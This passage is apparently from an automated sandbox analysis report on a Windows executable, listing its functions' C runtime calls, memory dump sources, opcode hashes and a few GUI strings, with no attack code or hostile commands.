                    • Part of subcall function 00007FF69DD05E40: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF69DCE13E2), ref: 00007FF69DD05EAD
                    • Part of subcall function 00007FF69DD05E40: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF69DCE13E2), ref: 00007FF69DD05EDD
                    • Part of subcall function 00007FF69DD05E40: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD05F2E
                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE140E
                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE1433
                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE1455
                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE1477
                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE1499
                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE14BB
                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE14DD
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: free
                  • String ID:
                  • API String ID: 1294909896-0
                  • Opcode ID: e692933884b511f06a371a5f64a962e5663714305f0b91d5374f10ea26a514f9
                  • Instruction ID: 1198b09eceb99edd2764d4972d3ab2358170cc6045d01c9e44948fc21da58573
                  • Opcode Fuzzy Hash: e692933884b511f06a371a5f64a962e5663714305f0b91d5374f10ea26a514f9
                  • Instruction Fuzzy Hash: 83310E61B0A686C5FF798F11E5416382278FF45B44F08D6B5CA8E93764EF2CA82A9350
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: memset$mallocmemmove
                  • String ID: #MOVE
                  • API String ID: 1346079573-3098322713
                  • Opcode ID: 33fd566f3a529c8e8064d13d5f9e868caf75b999f8504b581afdee089f94b77a
                  • Instruction ID: 6088c199af209269f46b28486e2678491df3ecf4e77b0466b3a88aafb8bb2f7b
                  • Opcode Fuzzy Hash: 33fd566f3a529c8e8064d13d5f9e868caf75b999f8504b581afdee089f94b77a
                  • Instruction Fuzzy Hash: 6CC12A32606B819AD754CF29E98879C77A9F705F54FA94239C7A84B3A0DF35E063C708
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID: ##previewing_picker$##selectable$Alpha Bar$context
                  • API String ID: 0-280553805
                  • Opcode ID: d2ccd9e9d57b4e27cd3cb2d7e42730fc78a08980861d66e4b428cd3389c48f4a
                  • Instruction ID: fed4d2595d03ad2917c3bbf4209abd77e1651e94e1dc2c1e975444daf05ba590
                  • Opcode Fuzzy Hash: d2ccd9e9d57b4e27cd3cb2d7e42730fc78a08980861d66e4b428cd3389c48f4a
                  • Instruction Fuzzy Hash: 4291B272A186C185E735CF26D4413B977A0FB99B88F086375DECD872A5EF38E5898700
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: free
                  • String ID:
                  • API String ID: 1294909896-0
                  • Opcode ID: 64ab0ab5dea34a1869dfd4597e87c764060636b70e6c931114b8a0c744b122b7
                  • Instruction ID: 56084582b5736e553acce18136a7ead4e0eabe94c1f7fda53d4d2a7478c76f8b
                  • Opcode Fuzzy Hash: 64ab0ab5dea34a1869dfd4597e87c764060636b70e6c931114b8a0c744b122b7
                  • Instruction Fuzzy Hash: 5F310C36606B4185EB248F11E55063873E8FF95FC8F1896B5CE8D82B64EF39E41AC390
                  APIs
                  • memset.VCRUNTIME140 ref: 00007FF69DCD3870
                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF69DCD3937
                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF69DCD398C
                  • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF69DCD39C3
                    • Part of subcall function 00007FF69DD1CF50: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000000100000000,00007FF69DCD2E7C), ref: 00007FF69DD1CF6A
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskmallocmemset
                  • String ID:
                  • API String ID: 1576226334-0
                  • Opcode ID: ca84f0f71ac320cb60d1b07a9ed6bdd6ef8f7cb1f78c50404b11775cb581d9c7
                  • Instruction ID: fea2266463d1f4b106a1af8b599cde88130d13c4f56c90c214974653c1421a6e
                  • Opcode Fuzzy Hash: ca84f0f71ac320cb60d1b07a9ed6bdd6ef8f7cb1f78c50404b11775cb581d9c7
                  • Instruction Fuzzy Hash: F171BF62F59B5284FB20CBA5D8402AC2375FB447A8F545376DEADA7BC9EF389046C340
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: Concurrency::cancel_current_taskmemmove
                  • String ID:
                  • API String ID: 1506368922-0
                  • Opcode ID: 78384b69103e27bfd2eaa2fba0366e819137fae091a7438aa0a9835b460dc675
                  • Instruction ID: b9f0554f74d3b1f1065fd2bfe2e0038cd98771d6b6896bd812d6fb8aa031a1ef
                  • Opcode Fuzzy Hash: 78384b69103e27bfd2eaa2fba0366e819137fae091a7438aa0a9835b460dc675
                  • Instruction Fuzzy Hash: 58412421A18742C5FB248F29D80036966A8EF50BD4F104276EAEC67BDAEF3CE053D740
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: memmove$Concurrency::cancel_current_task
                  • String ID:
                  • API String ID: 1247048853-0
                  • Opcode ID: d0d92fc3d23aaea99c7b9e78f1ff92c81559e9e86b05e7f9236f9f9f794db63a
                  • Instruction ID: cd6db063343aa7a27bb5251b35d82d631e3d4b46fcb91b17e368a5a9f43d18af
                  • Opcode Fuzzy Hash: d0d92fc3d23aaea99c7b9e78f1ff92c81559e9e86b05e7f9236f9f9f794db63a
                  • Instruction Fuzzy Hash: 4321C722A4D74699EB359B51E9403B91168DF04BA4F180771DFAD877C6FE7CA0938300
                  APIs
                  • __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF69DCE3821
                  • __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF69DCE38C9
                    • Part of subcall function 00007FF69DCFAA30: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCFAA5F
                    • Part of subcall function 00007FF69DCFAA30: memmove.VCRUNTIME140 ref: 00007FF69DCFAA77
                    • Part of subcall function 00007FF69DCFAA30: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCFAA97
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: __stdio_common_vsprintf$freemallocmemmove
                  • String ID: [io] %s: AppFocused %d
                  • API String ID: 4069205237-3463024498
                  • Opcode ID: 2695290c0e42ad1812660e8aaac1d4232748f79464a63f2d020f153c98c3e88d
                  • Instruction ID: f074ad6e4ee43fd40d684273d84be52f18218a77398069fa77cabaf0f8d3f5fb
                  • Opcode Fuzzy Hash: 2695290c0e42ad1812660e8aaac1d4232748f79464a63f2d020f153c98c3e88d
                  • Instruction Fuzzy Hash: C431D832B0875182E7348E96998137973A5FB88B95F544235EF9DC3B84EF3CE8568740
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: memmove$strncpy
                  • String ID:
                  • API String ID: 2493730309-0
                  • Opcode ID: a76fde700a949dfe6e758578b375d05a838bde585a35d4546ede48b869631391
                  • Instruction ID: 2c267e480e4c67f81f28f829763489542fa86d74f00ea9b085232c1ca8445dee
                  • Opcode Fuzzy Hash: a76fde700a949dfe6e758578b375d05a838bde585a35d4546ede48b869631391
                  • Instruction Fuzzy Hash: 20C11562A0C68685E7789A52E6413B9BBA1FB417C0F4452B1DACD836C5EF3CE48E8740
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: Xlength_error@std@@terminate
                  • String ID: string too long
                  • API String ID: 2379810350-2556327735
                  • Opcode ID: da22bef783820e7ebceba0b2827664123ffaaa150ebfa5efe8f679bdf58982c1
                  • Instruction ID: e5b153095f843af17e10e08ca910ce23e47ddfbe4eba002115740707b45cdcdc
                  • Opcode Fuzzy Hash: da22bef783820e7ebceba0b2827664123ffaaa150ebfa5efe8f679bdf58982c1
                  • Instruction Fuzzy Hash: 1DD0C920E15586D1E668AB21ED8A2382274FB1470AF9456B5C38E80560AE2D64DFCB80
                  APIs
                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00000000,00000000,00000000,00007FF69DCF9A12), ref: 00007FF69DCE1534
                  • __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00000000,00000000,00000000,00007FF69DCF9A12), ref: 00007FF69DCE1555
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: __acrt_iob_func__stdio_common_vfprintf
                  • String ID: [io] %s: AppFocused %d
                  • API String ID: 2168557111-3463024498
                  • Opcode ID: c619f3c25ac7089c66ceb367906e76c1b23de88c793528dc8861c92fc7885b30
                  • Instruction ID: a4c47fc7e05fd0121dd2658ebc2e5cb4337a892f9a17cc46d868a16decab0227
                  • Opcode Fuzzy Hash: c619f3c25ac7089c66ceb367906e76c1b23de88c793528dc8861c92fc7885b30
                  • Instruction Fuzzy Hash: 52E01C72608B8182D6108B50F90546AA3A4FB987C8F405135EBC887B69DF7CC565C740
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: freemalloc
                  • String ID:
                  • API String ID: 3061335427-0
                  • Opcode ID: e79206d2010ec9fa3033caffa8549567cefcee1929092e3713c95377ac1d27c1
                  • Instruction ID: 4c95c25931088dec28a387f392e7a10ec8465c6b23fb4fb8254ce5eb229081b8
                  • Opcode Fuzzy Hash: e79206d2010ec9fa3033caffa8549567cefcee1929092e3713c95377ac1d27c1
                  • Instruction Fuzzy Hash: E1B1C622A14B8486E721DB35D44427EB7A4FF99BC4F049336EFC992664EF38E446C750
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: memchrmemmove
                  • String ID:
                  • API String ID: 1132781299-0
                  • Opcode ID: a3e189dc26eaa213a0a0c07b79a80eedaa80ed018e3753dc9aceeff30a3cdde1
                  • Instruction ID: 60bbc6bec1a89364c5c17f563a9d809412a8bf43a9c4ab5184213ffc772b54ed
                  • Opcode Fuzzy Hash: a3e189dc26eaa213a0a0c07b79a80eedaa80ed018e3753dc9aceeff30a3cdde1
                  • Instruction Fuzzy Hash: 26610792B09B82C5EE388A299A406FA67A5FF45F80F444172DE9D93381EF3CE442D340
                  APIs
                  • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69DD081D9), ref: 00007FF69DD08869
                  • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69DD081D9), ref: 00007FF69DD0887B
                  • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69DD081D9), ref: 00007FF69DD08891
                  • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69DD081D9), ref: 00007FF69DD0899C
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: memset
                  • String ID:
                  • API String ID: 2221118986-0
                  • Opcode ID: 152f17929a581685cdc78bba23be91f4811f5a4121526cb05eca7fb54fdece61
                  • Instruction ID: 334dedc306785b9168f952b8b76d0d8627719ea014a7b9c3260d6c4d285fbebc
                  • Opcode Fuzzy Hash: 152f17929a581685cdc78bba23be91f4811f5a4121526cb05eca7fb54fdece61
                  • Instruction Fuzzy Hash: CE511332A04B9482D664CF2AE0402BA7765FF59BC0F18933ADE9863751EF38E158C340
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: memmove$freemalloc
                  • String ID:
                  • API String ID: 1763039611-0
                  • Opcode ID: e29c4a88ef318adcfd4d3c4c0851b7b3946657ae8f8855f8bcc02049b3da5514
                  • Instruction ID: 65ac365c5a356be6fe83d804f1abf21f10720020763d67ae37e137bc45df561d
                  • Opcode Fuzzy Hash: e29c4a88ef318adcfd4d3c4c0851b7b3946657ae8f8855f8bcc02049b3da5514
                  • Instruction Fuzzy Hash: 6C319E72B05A82C6EA248F1AE5401A8A364FB48B84B099576DF9DD7751EF3CE562C340
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: free
                  • String ID:
                  • API String ID: 1294909896-0
                  • Opcode ID: 01b2be66546068cf80c13b26f8391aba590e1e827be473604a35372b1146f92d
                  • Instruction ID: e3e8c4f046564199528f30415146407466f051c5fbe3c699b6a8501deb3bc238
                  • Opcode Fuzzy Hash: 01b2be66546068cf80c13b26f8391aba590e1e827be473604a35372b1146f92d
                  • Instruction Fuzzy Hash: ED313B32A09642C6EB288F15E540678B3B4FB44F84F089575CE9EA3754EF38E457D390
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: free
                  • String ID:
                  • API String ID: 1294909896-0
                  • Opcode ID: ae54f5c9806994ac951531603ea6b31cd4e811546bc845cfa7bd117968c93efe
                  • Instruction ID: 175e07b31450abd3b595918d968c813f1e7e06e00574f154f6022ede38df72f8
                  • Opcode Fuzzy Hash: ae54f5c9806994ac951531603ea6b31cd4e811546bc845cfa7bd117968c93efe
                  • Instruction Fuzzy Hash: 9B11FA30B0A686C9FE394F15E4507B86269FF45F45F08A6B5CD8EE7260EE3DA407A350